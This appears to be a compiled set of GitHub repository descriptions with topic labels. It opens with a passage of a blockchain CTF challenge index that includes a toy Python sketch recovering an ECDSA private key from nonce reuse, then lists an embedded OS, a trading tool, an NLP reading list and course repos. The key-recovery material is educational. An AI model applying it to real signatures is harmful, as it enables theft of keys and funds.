|[Ethernaut: 2. Fallout](src/Ethernaut)||

### Overwriting Storage Slots via Uninitialized Storage Pointers (Solidity < 0.5.0)

Since v0.5.0, uninitialized storage variables have been forbidden, so this bug cannot occur.

|Challenge|Note, Keywords|
|-|-|
|[Capture The Ether: Fifty years](src/CaptureTheEther)||
|Ethernaut: Locked ([deleted](https://forum.openzeppelin.com/t/ethernaut-locked-with-solidity-0-5/1115))||

### Other Ad-Hoc Vulnerabilities and Methods

|Challenge|Note, Keywords|
|-|-|
|[Paradigm CTF 2021: Bouncer](src/ParadigmCTF2021/Bouncer)|The funds required for batch processing are the same as for single processing.|
|Paradigm CTF 2021: Market|Make the value of one field be recognized as the value of another field by using key misalignment in the eternal storage pattern.|
|[EthernautDAO: 2. WalletLibrary](src/EthernautDAO/WalletLibrary)|`m` and `n` of an m-of-n multisig wallet can be changed.|
|[Paradigm CTF 2022: RESCUE](src/ParadigmCTF2022)||
|Paradigm CTF 2022: JUST-IN-TIME||
|Paradigm CTF 2022: 0XMONACO||
|[BalsnCTF 2022: Src](src/BalsnCTF2022)|`initialize`, `safeTransferFrom`, CREATE2|
|[Numen Cyber CTF 2023: LenderPool](src/NumenCTF)|flash loan|
|[Numen Cyber CTF 2023: GoatFinance](src/NumenCTF)|checksum address|
|[SEETF 2023: Pigeon Vault](src/SEETF2023)|EIP-2535 Diamonds, multi-facet proxy|
|[corCTF 2023: baby-wallet](src/corCTF2023)|missing `from`/`to` check|

## Bitcoin

Note: this section includes challenges of Bitcoin variants whose transaction model is Unspent Transaction Output (UTXO).

### Bitcoin Basics

|Challenge|Note, Keywords|
|-|-|
|TsukuCTF 2021: genesis|genesis block|
|WORMCON 0x01: What's My Wallet Address|Bitcoin address, RIPEMD-160|

### Recoveries of Private Keys by Same-Nonce Attacks

There was such a bug in the past, and it has been fixed by using [RFC 6979](https://datatracker.ietf.org/doc/html/rfc6979) (see https://github.com/daedalus/bitcoin-recover-privkey).

|Challenge|Note, Keywords|
|-|-|
|[DarkCTF: Duplicacy Within](src/DarkCTF)||

### Bypassing PoW of Other Applications Using Bitcoin's PoW Database

Bitcoin uses a series of leading zeros in a SHA-256 hash value as a proof of work (PoW), but if other applications are designed in the same way, their PoW time can be significantly reduced by choosing a value that matches the conditions from Bitcoin's past PoW results.

|Challenge|Note, Keywords|
|-|-|
|Dragon CTF 2020: Bit Flip 2|64-bit PoW|

## Cairo

|Challenge|Note, Keywords|
|-|-|
|[Paradigm CTF 2022: RIDDLE-OF-THE-SPHINX](src/ParadigmCTF2022)|contract call|
|[Paradigm CTF 2022: CAIRO-PROXY](src/ParadigmCTF2022)|integer overflow|
|[Paradigm CTF 2022: CAIRO-AUCTION](src/ParadigmCTF2022)|`Uint256`|
|[BalsnCTF 2022: Cairo Reverse](src/BalsnCTF2022)|reversing|

## Solana

|Challenge|Note, Keywords|
|-|-|
|ALLES! CTF 2021: Secret Store|Solana, SPL Token|
|ALLES! CTF 2021: Legit Bank||
|ALLES! CTF 2021: Bugchain||
|ALLES! CTF 2021: eBPF|reversing eBPF|
|[Paradigm CTF 2022: OTTERWORLD](src/ParadigmCTF2022)||
|[Paradigm CTF 2022: OTTERSWAP](src/ParadigmCTF2022)||
|Paradigm CTF 2022: POOL||
|Paradigm CTF 2022: SOLHANA-1||
|Paradigm CTF 2022: SOLHANA-2||
|Paradigm CTF 2022: SOLHANA-3||
|corCTF 2023: tribunal||
|Project SEKAI CTF 2023: The Bidding||
|Project SEKAI CTF 2023: Play for Free||

## Move

|Challenge|Note, Keywords|
|-|-|
|[Numen Cyber CTF 2023: Move to Checkin](src/NumenCTF)|contract call in Sui|
|[Numen Cyber CTF 2023: ChatGPT tell me where is the vulnerability](src/NumenCTF)|OSINT|
|[Numen Cyber CTF 2023: Move to Crackme](src/NumenCTF)|reversing Move code and a Linux executable|

## Other Blockchain-Related

Things that are not directly related to blockchains but are part of their ecosystems.

|Challenge|Note, Keywords|
|-|-|
|TsukuCTF 2021: InterPlanetary Protocol|IPFS address, Base32 in lowercase|
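Both the Ethereum and Bitcoin sections above mention recovering ECDSA private keys when the same nonce signs two different messages. The algebra behind that attack is short: from s = k⁻¹(z + r·d) mod n, two signatures sharing a nonce give k = (z1 − z2)/(s1 − s2) and then d = (s1·k − z1)/r. Here is a toy Python sketch of just that algebra; note that `r` is faked as a stand-in for the x-coordinate of k·G (no real curve arithmetic), and the key, nonce, and hash values are made up for illustration.

```python
# secp256k1 group order
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

def sign(d, k, z):
    # In real ECDSA, r is the x-coordinate of k*G mod N; any nonzero r
    # derived from k exhibits the same algebra, so we fake it here.
    r = k % N
    s = pow(k, -1, N) * (z + r * d) % N
    return r, s

def recover(r, s1, s2, z1, z2):
    # Nonce from the two signatures, then the private key.
    k = (z1 - z2) * pow(s1 - s2, -1, N) % N
    return (s1 * k - z1) * pow(r, -1, N) % N

d = 0x1234567890ABCDEF          # "secret" key (illustrative)
k = 0xDEADBEEF                  # reused nonce
z1, z2 = 0x1111, 0x2222         # two different message hashes
r, s1 = sign(d, k, z1)
_, s2 = sign(d, k, z2)
assert recover(r, s1, s2, z1, z2) == d
```

This is why deterministic nonces (RFC 6979, mentioned in the Bitcoin section) are used in practice: they remove the possibility of nonce reuse across messages.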
yaos
yaos codacy badge https api codacy com project badge grade 69c0ee97ee2843d9ac4b415d9ee21b6f https app codacy com app onkwon yaos utm source github com utm medium referral utm content onkwon yaos utm campaign badge grade dashboard fossa status https app fossa io api projects git 2bgithub com 2fonkwon 2fyaos svg type shield https app fossa io projects git 2bgithub com 2fonkwon 2fyaos ref badge shield yaos is an embedded operating system for internet of things iot devices specifically for a single core processor without mmu virtualization it is designed for energy efficiency and hardware independent development refer to documentation directory for more information such as compiling porting apis etc any feedback is welcome to kwon toanyone net and let me know if any of you are interested in porting to new mcu so that i can give you a hand getting started 1 download yaos git clone git github com onkwon yaos 2 get a toolchain get one from here https launchpad net gcc arm embedded if you don t have one installed yet or you can compile it from source code putting more effort which is not recommended but still worth trying 3 build stm32 make clean make stm32f1 or specify your board e g mango z1 make make burn supported boards at the moment are mango z1 http www mangoboard com main cate1 9 cate2 26 cate3 36 mycortex stm32f4 http www withrobot com mycortex stm32f4 nrf52 https www nordicsemi com eng products bluetooth low energy nrf52832 stm32f429i disco http www st com content st com en products evaluation tools product evaluation tools mcu eval tools stm32 mcu eval tools stm32 mcu discovery kits 32f429idiscovery html stm32f469i disco http www st com en evaluation tools 32f469idiscovery html stm32 lcd https www olimex com products arm st stm32 lcd ust mpb stm32f103 https www devicemart co kr 1089642 stm32f1 min https www aliexpress com item mini stm32f103c8t6 system board stm32 learning development board 1609777521 html in case of getting error messages something like 
undefined reference to `__aeabi_uidiv`

specify the library path when you make in the way below:

```
make LD_LIBRARY_PATH=/usr/local/arm/lib/gcc/arm-none-eabi/4.9.2
```

the path is dependent on your development environment

user task example

let me put an example of blinking a led for you to take a taste of how the code looks like user tasks would be placed under `tasks/` e g `tasks/my_first_task.c`:

```c
void main()
{
	int fd, led = 0;

	if ((fd = open("/dev/gpio20", O_WRONLY)) <= 0) {
		printf("can not open %x\n", fd);
		return;
	}

	while (1) {
		write(fd, &led, 1);
		led ^= 1;
		sleep(1);
	}

	close(fd);
}
REGISTER_TASK(main, 0, DEFAULT_PRIORITY, STACK_SIZE_DEFAULT);
```

features

task management and scheduling: two types of task are handled, normal and real time tasks; a round robin scheduler for normal tasks while a priority scheduler for real time tasks. each task is given a priority which can be dynamically changed with set_task_pri. for real time tasks a higher priority task always preempts lower priority tasks, while tasks of the same priority take turns under round robin scheduling. the scheduler can be stopped to reduce even the scheduling overhead in case of a time critical task. on the other hand normal tasks get a chance to run by a simplified fair scheduler that picks the minimum runtime value for the next task to run. tasks are always in one of five states: running, stopped, waiting, sleeping, or zombie. a task can be created both statically and dynamically at run time. system call interface: system resources are accessed by the system call interface entering privileged mode, as a user task runs in user (unprivileged) mode. virtual file system: the concept of a virtual file system (vfs) is implemented. the embedded flash rom in the soc can be mounted as the root file system (embedfs) while a ramfs is mounted as a devfs for device nodes. empty flash memory is registered as embedfs so that the user can use it just like a normal file system. memory management: the page is the unit of memory management, but an alternative memory manager can be used in a system short of memory. buddy allocator and first fit
allocator are implemented deferred interrupt servicing softirq softirqs will preempt any work except the response to a real interrupt as they run at a high priority in fact softirq is just a kernel task running with interrupts enabled and can sleep but has the highest priority amongst running tasks synchronization synchronization primitives such as semaphore spinlock etc blocking non blocking i o operations device driver license fossa status https app fossa io api projects git 2bgithub com 2fonkwon 2fyaos svg type large https app fossa io projects git 2bgithub com 2fonkwon 2fyaos ref badge large
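The scheduling policy described above (real-time tasks preempt by priority; among normal tasks, the one with the least accumulated runtime runs next under the simplified fair scheduler) can be illustrated with a short sketch. yaos itself is written in C; this is a hypothetical Python illustration of the policy, not yaos source.

```python
# Simplified illustration of the yaos scheduling policy described above:
# real-time tasks always preempt normal tasks (highest priority wins);
# among normal tasks, the one with the smallest accumulated runtime
# runs next. Hypothetical sketch only -- yaos itself is written in C.

class Task:
    def __init__(self, name, priority=None):
        self.name = name
        self.priority = priority      # None => normal task
        self.runtime = 0              # accumulated run ticks

def pick_next(tasks):
    rt = [t for t in tasks if t.priority is not None]
    if rt:
        # a higher priority real-time task always preempts
        return max(rt, key=lambda t: t.priority)
    # simplified fair scheduler: least accumulated runtime runs next
    return min(tasks, key=lambda t: t.runtime)

tasks = [Task("logger"), Task("blink"), Task("motor", priority=5)]
assert pick_next(tasks).name == "motor"   # real-time preempts normals
tasks = tasks[:2]
tasks[0].runtime = 10
assert pick_next(tasks).name == "blink"   # least runtime goes next
```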
os rtos iot embedded arm cortex-m mcu microcontroller
os
Radazin
radazin information technology company created by reza naeemi framework django database postgresql
server
bitmex-scaled-orders
bitmex scaled orders a tool for creating scaled orders bulk orders on bitmex preview https i imgur com kfsqzlh png video demo https streamable com 8kikxz you should only run this locally table of contents features features requirements requirements startup startup tests tests changelog changelog todo todo maybe maybe features generate limit buy sell orders based on a set of variables amount number of orders upper price and lower price spread amount evenly increasingly or decreasingly supports all bitmex instruments view current positions view and cancel current orders retry on overload until successful supports testnet and production requirements nodejs 8 5 startup download latest release from https github com nice table bitmex scaled orders releases latest or clone the project open a terminal and run the following from the project folder npm install when npm install has finished we are ready to start the app run this in a terminal npm run startup app should open in your browser automatically and render when ready upgrading upgrading should be as simple as overwriting the source code or pulling latest followed by a npm install in terminal app is then ready and can be started with npm run startup development when doing dev work i run npm start in one terminal and npm run proxy dev in another tests tests can be run in a terminal npm test changelog for changelog see https github com nice table bitmex scaled orders releases todo warn user if one or more orders may be executed as a market order maybe other order types strategies https www sierrachart com index php page doc ordertypes html moon
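The order-generation feature above (n limit orders between an upper and lower price, with the amount spread evenly, increasingly, or decreasingly) boils down to simple arithmetic. The app itself is JavaScript; the following is a hypothetical Python sketch of that arithmetic, not the tool's actual code.

```python
# Hypothetical sketch of the scaled-order arithmetic the tool performs
# (the app itself is JavaScript): n limit orders spaced evenly between
# a lower and upper price, with the total amount split evenly,
# increasingly, or decreasingly across the orders.

def scaled_orders(amount, n, upper, lower, distribution="even"):
    step = (upper - lower) / (n - 1) if n > 1 else 0
    prices = [round(lower + i * step, 2) for i in range(n)]
    if distribution == "even":
        weights = [1] * n
    elif distribution == "increasing":   # more size at higher prices
        weights = list(range(1, n + 1))
    elif distribution == "decreasing":   # more size at lower prices
        weights = list(range(n, 0, -1))
    total = sum(weights)
    return [(p, round(amount * w / total)) for p, w in zip(prices, weights)]

orders = scaled_orders(1000, 5, 9400, 9000)
assert [p for p, _ in orders] == [9000.0, 9100.0, 9200.0, 9300.0, 9400.0]
assert all(q == 200 for _, q in orders)   # even split of 1000 over 5
```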
front_end
awesome-neural-adaptation-in-NLP
awesome neural adaptation in nlp mit license https img shields io badge license mit green svg https opensource org licenses mit awesome https cdn rawgit com sindresorhus awesome d7305f38d29fed78fa85652e3a63e154dd8e8829 media badge svg https github com sindresorhus awesome a curated list of awesome work on neural unsupervised domain adaptation in natural language processing including links to papers the focus is on unsupervised neural da methods and currently on work outside machine translation feel free to contribute by creating a pull request as outlined in contributing md contributing md taxonomy image https github com bplank awesome neural adaptation in nlp blob master taxonomy png raw true please cite our survey paper https arxiv org abs 2006 00632 ramponi and plank coling 2020 https www aclweb org anthology 2020 coling main 603 if you find it useful in your research inproceedings ramponi plank 2020 neural title neural unsupervised domain adaptation in nlp a survey author ramponi alan and plank barbara booktitle proceedings of the 28th international conference on computational linguistics month dec year 2020 address barcelona spain online publisher international committee on computational linguistics url https www aclweb org anthology 2020 coling main 603 doi 10 18653 v1 2020 coling main 603 pages 6838 6855 contents surveys surveys collections collections unsupervised da unsupervised da by methods by methods model centric methods model centric methods feature centric methods feature centric loss centric methods loss centric data centric methods data centric methods pseudo labeling methods pseudo labeling data selection methods data selection pre training methods pre training hybrid methods hybrid methods by tasks by tasks classification inference classification inference sentiment analysis sentiment analysis language identification language identification binary text classification binary text classification machine reading machine reading duplicate question 
detection duplicate question detection stance detection stance detection political data identification political data identification question answering question answering summarization summarization structured prediction structured prediction natural language inference natural language inference part of speech tagging pos tagging dependency parsing dependency parsing named entity recognition named entity recognition event extraction event extraction relation extraction relation extraction surveys overview of surveys in other areas and related topics machine learning a survey on transfer learning pan yang 2010 ieee https sci hub tw 10 1109 msp 2014 2347059 vision deep visual domain adaptation a survey wang deng neurocomputing 2018 https arxiv org abs 1802 03601v4 generalizing to unseen domains a survey on domain generalization wang et al 2021 technical report arxiv https arxiv org abs 2103 03097 machine translation a survey of domain adaptation for neural machine translation chu wang coling 2018 https www aclweb org anthology c18 1111 pdf pre neural surveys on domain adaptation in nlp domain adaptation in natural language processing jiang 2008 phd dissertation chapter 2 https www ideals illinois edu handle 2142 10870 a literature survey on domain adaptation of statistical classifiers jiang 2008 technical report http www mysmu edu faculty jingjiang papers da survey pdf domain adaptation for parsing plank 2011 phd dissertation chapter 3 https www rug nl research portal files 10469724 03c3 pdf transfer learning for nlp neural transfer learning for nlp ruder 2019 phd dissertation https ruder io thesis neural transfer learning for nlp pdf low resource nlp a survey on recent approaches for natural language processing in low resource scenarios hedderich et al 2020 https arxiv org abs 2010 12309 cross lingual learning a survey of cross lingual word embedding models ruder vuli s gaard jair 2019 https www jair org index php jair article view 11640 multi task learning an 
overview of multi task learning in deep neural networks ruder arxiv 2017 https arxiv org abs 1706 05098 domain divergence domain divergences a survey and empirical analysis kashyap et al 2020 https arxiv org abs 2010 12198 collections related awesome collections awesome domain adaptation https github com zhaoxin94 awesome domain adaptation nlp progress page for domain adaptation http nlpprogress com english domain adaptation html awesome datascience https github com academic awesome datascience the nlp pandect https github com ivan bilan the nlp pandect unsupervised da by methods a list of papers categorized by methods model centric methods neural structural correspondence learning for domain adaptation ziser and reichart conll 2017 https www aclweb org anthology k17 1040 deep pivot based modeling for cross language cross domain transfer with minimal guidance ziser and reichart emnlp 2018a https www aclweb org anthology d18 1022 pivot based language modeling for improved neural domain adaptation ziser and reichart naacl hlt 2018b https www aclweb org anthology n18 1112 task refinement learning for improved accuracy and stability of unsupervised domain adaptation ziser and reichart acl 2019 https www aclweb org anthology p19 1591 simplified neural unsupervised domain adaptation miller naacl hlt 2019 https www aclweb org anthology n19 1039 domain adaptation for large scale sentiment classification a deep learning approach glorot et al icml 2011 https icml cc 2011 papers 342 icmlpaper pdf marginalized denoising autoencoders for domain adaptation chen et al icml 2012 https icml cc 2012 papers 416 pdf fast easy unsupervised domain adaptation with marginalized structured dropout yang and eisenstein acl 2014 https www aclweb org anthology p14 2088 a domain adaptation regularization for denoising autoencoders clinchant et al acl 2016 https www aclweb org anthology p16 2005 domain adversarial training of neural networks ganin et al jmlr 2016 https jmlr org papers volume17 
15 239 15 239 pdf end to end adversarial memory network for cross domain sentiment classification li et al ijcai 2017 https www ijcai org proceedings 2017 0311 pdf adversarial adaptation of synthetic or stale data kim et al acl 2017 https www aclweb org anthology p17 1119 adversarial training for cross domain universal dependency parsing sato et al conll 2017 https www aclweb org anthology k17 3007 adversarial training for relation extraction wu et al emnlp 2017 https www aclweb org anthology d17 1187 robust multilingual part of speech tagging via adversarial training yasunaga et al naacl hlt 2018 https www aclweb org anthology n18 1089 wasserstein distance guided representation learning for domain adaptation shen et al aaai 2018 https arxiv org abs 1707 01217 what s in a domain learning domain robust text representations using adversarial training li et al naacl hlt 2018 https www aclweb org anthology n18 2076 domain adaptation with adversarial training and graph embeddings alam et al acl 2018 https www aclweb org anthology p18 1099 adversarial domain adaptation for machine reading comprehension wang et al emnlp ijcnlp 2019 https www aclweb org anthology d19 1254 adversarial domain adaptation for duplicate question detection shah et al emnlp 2018 https www aclweb org anthology d18 1131 domain adaptation for relation extraction with domain adversarial neural network fu et al ijcnlp 2017 https www aclweb org anthology i17 2072 generalizing biomedical relation classification with neural adversarial domain adaptation rios et al bioinf 2018 https academic oup com bioinformatics article 34 17 2973 4953706 adversarial domain adaptation for stance detection xu et al arxiv 2019 https arxiv org abs 1902 02401 genre separation network with adversarial training for cross genre relation extraction shi et al emnlp 2018 https www aclweb org anthology d18 1125 a comparative analysis of unsupervised language adaptation methods rocha lopes cardoso deeplo 2019 https www aclweb org 
anthology d19 6102 kingdom knowledge guided domain adaptation for sentiment analysis ghosal et al acl 2020 https www aclweb org anthology 2020 acl main 292 towards open domain event trigger identification using adversarial domain adaptation naik rose acl 2020 https www aclweb org anthology 2020 acl main 681 transformer based multi source domain adaptation wright and augenstein emnlp 2020 https arxiv org pdf 2009 07806 pdf unsupervised cross lingual adaptation of dependency parsers using crf autoencoders li and tu findings of emnlp 2020 https www aclweb org anthology 2020 findings emnlp 193 effective unsupervised domain adaptation with adversarially trained language models vu et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 497 inexpensive domain adaptation of pretrained language models case studies on biomedical ner and covid 19 qa poerner et al findings of emnlp 2020 https www aclweb org anthology 2020 findings emnlp 134 adapting event extractors to medical data bridging the covariate shift naik et al eacl 2021 https aclanthology org 2021 eacl main 258 pdf data centric methods unsupervised domain adaptation of contextualized embeddings for sequence labeling han eisenstein emnlp ijcnlp 2019 https www aclweb org anthology d19 1433 semi supervised domain adaptation for dependency parsing li et al acl 2019 https www aclweb org anthology p19 1229 adaptive ensembling unsupervised domain adaptation for political document analysis desai et al emnlp ijcnlp 2019 https www aclweb org anthology d19 1478 don t stop pretraining adapt language models to domains and tasks gururangan et al acl 2020 https www aclweb org anthology 2020 acl main 740 end to end synthetic data generation for domain adaptation of question answering systems shakeri et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 439 feature adaptation of pre trained language models across languages and domains with robust self training ye et al emnlp 2020 https www aclweb org anthology 2020 
emnlp main 599 udalm unsupervised domain adaptation through language modeling karouzos et al naacl 2021 https www aclweb org anthology 2021 naacl main 203 pdf n b similar to aux mlm which was contemporaneously proposed for cross lingual learning by van der goot et al 2021 naacl https www aclweb org anthology 2021 naacl main 197 pdf adapting event extractors to medical data bridging the covariate shift naik et al eacl 2021 https aclanthology org 2021 eacl main 258 pdf hybrid methods asymmetric tri training for unsupervised domain adaptation saito et al icml 2017 http proceedings mlr press v70 saito17a html strong baselines for neural semi supervised learning under domain shift ruder plank acl 2018 https www aclweb org anthology p18 1096 cross domain ner using cross domain language modeling jia et al acl 2019 https www aclweb org anthology p19 1236 deep contextualized self training for low resource dependency parsing rotman reichart tacl 2019 https www mitpressjournals org doi full 10 1162 tacl a 00294 self adaptation for unsupervised domain adaptation cui bollegala ranlp 2019 https www aclweb org anthology r19 1025 multi task domain adaptation for sequence tagging peng dredze repl4nlp 2017 https www aclweb org anthology w17 2612 multi source domain adaptation for text classification via distancenet bandits guo et al aaai 2020 https arxiv org abs 2001 04362 perl pivot based domain adaptation for pre trained deep contextualized embedding models ben david et al tacl 2020 https arxiv org abs 2006 09075 unsupervised adaptation of question answering systems via generative self training rennie et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 87 by tasks a list of papers categorized by tasks classification inference all papers pertaining to classification and inference tasks are indicated in the respective sections below sentiment analysis neural structural correspondence learning for domain adaptation ziser and reichart conll 2017 https www aclweb org 
anthology k17 1040 deep pivot based modeling for cross language cross domain transfer with minimal guidance ziser and reichart emnlp 2018a https www aclweb org anthology d18 1022 pivot based language modeling for improved neural domain adaptation ziser and reichart naacl hlt 2018b https www aclweb org anthology n18 1112 task refinement learning for improved accuracy and stability of unsupervised domain adaptation ziser and reichart acl 2019 https www aclweb org anthology p19 1591 simplified neural unsupervised domain adaptation miller naacl hlt 2019 https www aclweb org anthology n19 1039 domain adaptation for large scale sentiment classification a deep learning approach glorot et al icml 2011 https icml cc 2011 papers 342 icmlpaper pdf marginalized denoising autoencoders for domain adaptation chen et al icml 2012 https icml cc 2012 papers 416 pdf a domain adaptation regularization for denoising autoencoders clinchant et al acl 2016 https www aclweb org anthology p16 2005 domain adversarial training of neural networks ganin et al jmlr 2016 https jmlr org papers volume17 15 239 15 239 pdf end to end adversarial memory network for cross domain sentiment classification li et al ijcai 2017 https www ijcai org proceedings 2017 0311 pdf wasserstein distance guided representation learning for domain adaptation shen et al aaai 2018 https arxiv org abs 1707 01217 what s in a domain learning domain robust text representations using adversarial training li et al naacl hlt 2018 https www aclweb org anthology n18 2076 a comparative analysis of unsupervised language adaptation methods rocha lopes cardoso deeplo 2019 https www aclweb org anthology d19 6102 kingdom knowledge guided domain adaptation for sentiment analysis ghosal et al acl 2020 https www aclweb org anthology 2020 acl main 292 don t stop pretraining adapt language models to domains and tasks gururangan et al acl 2020 https www aclweb org anthology 2020 acl main 740 asymmetric tri training for unsupervised domain 
adaptation saito et al icml 2017 http proceedings mlr press v70 saito17a html strong baselines for neural semi supervised learning under domain shift ruder plank acl 2018 https www aclweb org anthology p18 1096 self adaptation for unsupervised domain adaptation cui bollegala ranlp 2019 https www aclweb org anthology r19 1025 multi source domain adaptation for text classification via distancenet bandits guo et al aaai 2020 https arxiv org abs 2001 04362 perl pivot based domain adaptation for pre trained deep contextualized embedding models ben david et al tacl 2020 https arxiv org abs 2006 09075 feature adaptation of pre trained language models across languages and domains with robust self training ye et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 599 udalm unsupervised domain adaptation through language modeling karouzos et al naacl 2021 https www aclweb org anthology 2021 naacl main 203 pdf language identification what s in a domain learning domain robust text representations using adversarial training li et al naacl hlt 2018 https www aclweb org anthology n18 2076 binary text classification a domain adaptation regularization for denoising autoencoders clinchant et al acl 2016 https www aclweb org anthology p16 2005 adversarial adaptation of synthetic or stale data kim et al acl 2017 https www aclweb org anthology p17 1119 domain adaptation with adversarial training and graph embeddings alam et al acl 2018 https www aclweb org anthology p18 1099 don t stop pretraining adapt language models to domains and tasks gururangan et al acl 2020 https www aclweb org anthology 2020 acl main 740 transformer based multi source domain adaptation wright and augenstein emnlp 2020 https arxiv org pdf 2009 07806 pdf machine reading adversarial domain adaptation for machine reading comprehension wang et al emnlp ijcnlp 2019 https www aclweb org anthology d19 1254 duplicate question detection adversarial domain adaptation for duplicate question detection shah et al 
emnlp 2018 https www aclweb org anthology d18 1131 stance detection adversarial domain adaptation for stance detection xu et al arxiv 2019 https arxiv org abs 1902 02401 political data identification adaptive ensembling unsupervised domain adaptation for political document analysis desai et al emnlp ijcnlp 2019 https www aclweb org anthology d19 1478 question answering unsupervised adaptation of question answering systems via generative self training rennie et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 87 end to end synthetic data generation for domain adaptation of question answering systems shakeri et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 439 summarization adaptsum towards low resource domain adaptation forabstractive summarization yu et al naacl 2021 https www aclweb org anthology 2021 naacl main 471 pdf structured prediction all papers pertaining to structured prediction tasks are indicated in the respective sections below natural language inference a comparative analysis of unsupervised language adaptation methods rocha lopes cardoso deeplo 2019 https www aclweb org anthology d19 6102 don t stop pretraining adapt language models to domains and tasks gururangan et al acl 2020 https www aclweb org anthology 2020 acl main 740 part of speech tagging fast easy unsupervised domain adaptation with marginalized structured dropout yang and eisenstein acl 2014 https www aclweb org anthology p14 2088 robust multilingual part of speech tagging via adversarial training yasunaga et al naacl hlt 2018 https www aclweb org anthology n18 1089 unsupervised domain adaptation of contextualized embeddings for sequence labeling han eisenstein emnlp ijcnlp 2019 https www aclweb org anthology d19 1433 strong baselines for neural semi supervised learning under domain shift ruder plank acl 2018 https www aclweb org anthology p18 1096 multi task domain adaptation for sequence tagging peng dredze repl4nlp 2017 https www aclweb org anthology w17 
2612 dependency parsing adversarial training for cross domain universal dependency parsing sato et al conll 2017 https www aclweb org anthology k17 3007 semi supervised domain adaptation for dependency parsing li et al acl 2019 https www aclweb org anthology p19 1229 deep contextualized self training for low resource dependency parsing rotman reichart tacl 2019 https www mitpressjournals org doi full 10 1162 tacl a 00294 unsupervised cross lingual adaptation of dependency parsers using crf autoencoders li and tu findings of emnlp 2020 https www aclweb org anthology 2020 findings emnlp 193 named entity recognition adversarial adaptation of synthetic or stale data kim et al acl 2017 https www aclweb org anthology p17 1119 towards open domain event trigger identification using adversarial domain adaptation naik rose acl 2020 https www aclweb org anthology 2020 acl main 681 unsupervised domain adaptation of contextualized embeddings for sequence labeling han eisenstein emnlp ijcnlp 2019 https www aclweb org anthology d19 1433 cross domain ner using cross domain language modeling jia et al acl 2019 https www aclweb org anthology p19 1236 multi task domain adaptation for sequence tagging peng dredze repl4nlp 2017 https www aclweb org anthology w17 2612 effective unsupervised domain adaptation with adversarially trained language models vu et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 497 inexpensive domain adaptation of pretrained language models case studies on biomedical ner and covid 19 qa poerner et al findings of emnlp 2020 https www aclweb org anthology 2020 findings emnlp 134 event extraction adapting event extractors to medical data bridging the covariate shift naik et al eacl 2021 https aclanthology org 2021 eacl main 258 pdf relation extraction adversarial training for relation extraction wu et al emnlp 2017 https www aclweb org anthology d17 1187 domain adaptation for relation extraction with domain adversarial neural network fu et al ijcnlp 
2017 https www aclweb org anthology i17 2072 generalizing biomedical relation classification with neural adversarial domain adaptation rios et al bioinf 2018 https academic oup com bioinformatics article 34 17 2973 4953706 genre separation network with adversarial training for cross genre relation extraction shi et al emnlp 2018 https www aclweb org anthology d18 1125 don t stop pretraining adapt language models to domains and tasks gururangan et al acl 2020 https www aclweb org anthology 2020 acl main 740
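Several of the data-centric and hybrid methods listed above (self-training, tri-training, adaptive ensembling) share the same pseudo-labeling loop: train on labeled source data, predict on unlabeled target data, keep only confident predictions as new training examples, and retrain. A minimal sketch of that loop, with a toy nearest-centroid classifier standing in for the neural model:

```python
# Minimal sketch of the pseudo-labeling (self-training) loop shared by
# many data-centric adaptation methods listed above: train on source,
# label the unlabeled target data, keep confident predictions, retrain.
# A toy 1-d nearest-centroid classifier stands in for the neural model.

def centroid(points):
    return sum(points) / len(points)

def self_train(source, target, threshold, rounds=3):
    # source: {label: [feature values]}; target: unlabeled values
    labeled = {k: list(v) for k, v in source.items()}
    for _ in range(rounds):
        cents = {k: centroid(v) for k, v in labeled.items()}
        for x in list(target):
            dists = sorted((abs(x - c), k) for k, c in cents.items())
            # "confidence" = margin between best and second-best label
            if dists[1][0] - dists[0][0] >= threshold:
                labeled[dists[0][1]].append(x)   # adopt pseudo-label
                target.remove(x)
    return {k: centroid(v) for k, v in labeled.items()}

cents = self_train({"neg": [0.0, 1.0], "pos": [9.0, 10.0]},
                   [1.5, 8.5, 5.2], threshold=2.0)
assert cents["neg"] < cents["pos"]   # ambiguous 5.2 is never adopted
```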
ai
ibm-django-app-onlinecourse
general notes an onlinecourse app has already been provided in this repo upon which you will be adding a new assessment feature if you want to develop the final project on theia hosted by ibm developer skills network https labs cognitiveclass ai you will need to create the same project structure on theia workspace and save it every time you close the browser or you could develop the final project locally by setting up your own python runtime and ide hints for the final project are left in source code files you may choose any cloud platform for deployment default is ibm cloud foundry depending on your deployment you may choose any sql database django supports such as sqlite3 postgresql and mysql default is sqlite3 er diagram for your reference we have prepared the er diagram design for the new assessment feature onlinecourse er diagram https github com ibm developer skills network final cloud app with database blob master static media course images onlinecourse app er png
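The ER diagram referenced above defines the entities for the new assessment feature. In the project they are implemented as Django models; the following framework-free sketch shows the shape of those entities, with entity and field names (Question, Choice, grade, is_correct) assumed from the diagram rather than taken from the repo's source.

```python
# Framework-free sketch of the assessment entities from the ER diagram
# above. The project implements these as Django models; the names used
# here (Question, Choice, grade, is_correct) are assumptions based on
# the diagram, not the repo's actual source.

from dataclasses import dataclass, field

@dataclass
class Choice:
    text: str
    is_correct: bool

@dataclass
class Question:
    text: str
    grade: int
    choices: list = field(default_factory=list)

    def is_answered_correctly(self, selected):
        # full credit only if exactly the correct choices were selected
        correct = {i for i, c in enumerate(self.choices) if c.is_correct}
        return set(selected) == correct

q = Question("is django a python framework?", grade=10, choices=[
    Choice("yes", True), Choice("no", False)])
assert q.is_answered_correctly([0])
assert not q.is_answered_correctly([1])
```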
server
Learn-Blockchain-Programming-with-JavaScript
learn blockchain programming with javascript a href https www packtpub com web development learn blockchain programming javascript utm source github utm medium repository utm campaign 9781789618822 img src https www packtpub com sites default files b12086 png alt learn blockchain programming with javascript height 256px align right a this is the code repository for learn blockchain programming with javascript https www packtpub com web development learn blockchain programming javascript utm source github utm medium repository utm campaign 9781789618822 published by packt build your very own blockchain and decentralized network with javascript and node js what is this book about learn blockchain programming with javascript begins by giving you a clear understanding of what blockchain technology is you ll then set up an environment to build your very own blockchain and you ll add various functionalities to it by adding functionalities to your blockchain such as the ability to mine new blocks create transactions and secure your blockchain through a proof of work you ll gain an in depth understanding of how blockchain technology functions this book covers the following exciting features gain an in depth understanding of blockchain and the environment setup create your very own decentralized blockchain network from scratch build and test the various endpoints necessary to create a decentralized network learn about proof of work and 